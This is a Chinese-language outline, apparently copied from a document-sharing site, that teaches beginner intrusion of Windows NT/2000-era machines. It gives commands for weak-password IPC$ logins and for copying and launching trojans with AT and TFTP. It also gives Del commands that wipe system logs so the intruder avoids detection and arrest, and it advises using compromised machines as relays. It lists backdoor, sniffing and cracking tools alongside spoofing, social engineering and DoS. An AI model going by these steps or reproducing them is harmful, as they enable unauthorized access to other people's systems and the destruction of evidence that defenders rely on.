黑客必须掌握的技术

黑客必须掌握的技术
黑客编：
必须要掌握的几个命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping

必须要掌握的几个协议
·http
·dns
·ftp
·Pop
·Smtp


·Icmp
·Udp
·tcp

开始
·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了!
·因为你掌握了这些,剩余的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具

高级
·自己编写专用的黑客工具
·自己发现系统漏洞

黑客入侵手段
·收集信息:
· 收集要入侵的目标信息
· IP,域名,端口,漏洞,位置

弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip “password” /user:user
·如果目标机开3389服务,可以直接连接

黑客基地https://www.wendangku.net/doc/ba3854668.html,制作
·在sql的sa弱口令,可以用sql连接器直接 ·登陆

后门木马
·如果有ipc$共享,可以copy过去木马后门
·用at启动
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行

密码破解
·远程破解mysql,mssql,ftp,mail,共享密码
·本地破解管理员(administrator)密码

缓冲溢出
·可以用缓冲溢出攻击,
·比如流行的webdev,rdcom模块漏洞
·可以直接得到system管理权限
·缓冲溢出后的一般现象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>



Web服务漏洞
·例如:
·Unicode漏洞遍历磁盘和执行程序
·二次编码漏洞遍历磁盘和执行程序
·.HTR漏洞查看源代码

嗅探监听
·例如:
·针对web监听
·针对mail监听
·工具如:sinffer , iris

欺骗攻击
·例如:
·运用arp欺骗攻击

伪装欺骗
·常见的如:mail病毒
·把一个文件改名字甚至图标,欺骗对方执行

社会工程学


·例如:
·QQ聊天诱惑
·EMAIL信息
·电话
·诱惑

拒绝服务
·例如:
·Dos攻击
·Ddos攻击

利用跳板
·利用自己的肉鸡作为跳板攻击别的机器
·My PC------>跳板(肉鸡)--->目标

路由器漏洞
·如:
·原始密码
·程序漏洞

防火墙
·利用欺骗攻击防火墙,导致防火墙功能失效


·利用防火墙的模块漏洞

unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·这些目前先不讲解

精通黑客工具
·必须有一套自己可以完全掌握的黑客工具
·如端口扫描 Nscan,bluescanport
·监听工具:sinffer iris
·telnet工具:nc
·扫描工具:sss,nmap, LANguard
·后门工具:radmin,winshell
·密码破解:lc4
·远程管理:pcanywhere
·会使用各种经典的黑客工具

除日志
·在你入侵机器以后,离开的时候,要完全清除
·自己在那台机器上留下的痕迹
·例如清除
·Del C:\WINNT\system32\LogFil

es\*.*


·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt

如果你不清除日志
·当目标机器的管理员发现你的证据
·完全可以让你在大墙内渡过一段日子

黑客
·当你完全掌握这些后
·你就成为了一名小黑客

高级
·编写自己的黑客工具
·发现系统漏洞

高级黑客
·目前你足以成为一个高级黑客了

真正的黑客
·精通各种网络协议


·精通操作系统
·精通编程技术
·精通安全防护
·不搞破坏
·挑战技术难题